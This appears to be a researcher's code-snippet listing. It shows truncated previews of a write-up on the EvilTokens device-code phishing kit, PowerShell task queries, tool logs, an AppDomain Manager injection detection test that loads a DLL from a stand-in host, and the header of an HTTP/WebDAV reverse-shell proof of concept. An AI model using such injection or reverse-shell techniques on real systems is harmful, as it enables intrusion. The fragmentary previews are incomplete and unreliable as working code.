Casey secdev02

Is EvilTokens a Watershed Moment?

Short answer: A meaningful inflection point, but probably not a true watershed. EvilTokens consolidates several existing techniques into the first commodified, AI-end-to-end device code phishing service — significant, but the underlying attack and its mitigations are not new.

Sources

Microsoft Security Blog — Inside an AI-enabled device code phishing campaign (April 6, 2026)
Huntress — Riding the Rails: Threat Actors Abuse Railway.com PaaS as Microsoft 365 Token Attack Infrastructure (March 20, 2026; updated March 23)
Sekoia — New widespread EvilTokens kit: device code phishing as-a-service – Part 1 (March 30, 2026)
[Sekoia — EvilTokens: an AI-augmented Phishing-as-a-Service fo

Get-ScheduledTask | Where-Object {$_.Actions.Execute -like 'cmd.exe'} | Select-Object TaskName, TaskPath, State

Get-ScheduledTask | ForEach-Object {
    $task = $_
    $_.Actions | Where-Object {$_.Execute -like '*cmd.exe*'} | ForEach-Object {
        [PSCustomObject]@{
            TaskName = $task.TaskName
            TaskPath = $task.TaskPath
 State = $task.State

============================================================ [09:00:11] 🚀 SMART TOOL: RENAME ALL FUNCTIONS

Starting OPTIMIZED bulk function analysis with mode: smart_enumeration

============================================================ [09:00:11] ⚡ PERFORMANCE ENHANCEMENTS

• Batch processing (size: 50)

A single file that has 2 different ways of behaving

IN this case we simply load and compile 2 difference C# calls.

Use your imagination.

	<!DOCTYPE html>

	<html lang="en">
	<head>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<title>Lateral Movement Modeler</title>
	<script src="https://cdnjs.cloudflare.com/ajax/libs/d3/7.8.5/d3.min.js"></script>
	<style>
	@import url('https://fonts.googleapis.com/css2?family=Google+Sans:wght@400;500;700&family=Google+Sans+Mono&display=swap');

	<!DOCTYPE html>
	<html lang="en">
	<head>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<title>Physics Construct</title>
	<style>
	@import url('https://fonts.googleapis.com/css2?family=Share+Tech+Mono&family=Orbitron:wght@400;700;900&display=swap');

	:root {

	# AppDomain Manager Injection Detection Tests
	# This script tests three methods of AppDomain Manager injection

	param(
	[string]$TestExecutable = "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
	[string]$RemoteServer = "http://yourserver.com/tasks.dll",
	[string]$Base64RemoteDll = ""
	)

	$ErrorActionPreference = "Stop"

	Microsoft (R) Windows Debugger Version 6.12.0002.633 X86
	Copyright (c) Microsoft Corporation. All rights reserved.

	Loading Dump File [C:\dumps\regret.dmp]
	User Mini Dump File: Only registers, stack and portions of memory are available

	Symbol search path is: SRVc:\symbolshttp://msdl.microsoft.com/download/symbols
	Executable search path is:
	Windows XP Version 2600 (Service Pack 2) MP (2 procs) Free x86 compatible
	Product: WinNt, suite: SingleUserTS

	<#
	Obtained from https://github.com/re4lity/subTee-gits-backups/blob/master/JEWebDav.ps1
	#>

	<#
	.SYNOPSIS

	Simple Reverse Shell over HTTP. Deliver the link to the target and wait for connectback.

	Read And Write Files Over WebDAV Proof Of Concept

	import math
	import time

	def gcd_factorial_efficient(n):
	"""Compute GCD(sqrt(n)!, n) efficiently"""
	sqrt_n = int(math.sqrt(n))
	g = n

	print(f"Computing GCD({sqrt_n}!, {n})")
	print(f"Processing {sqrt_n} numbers...\n")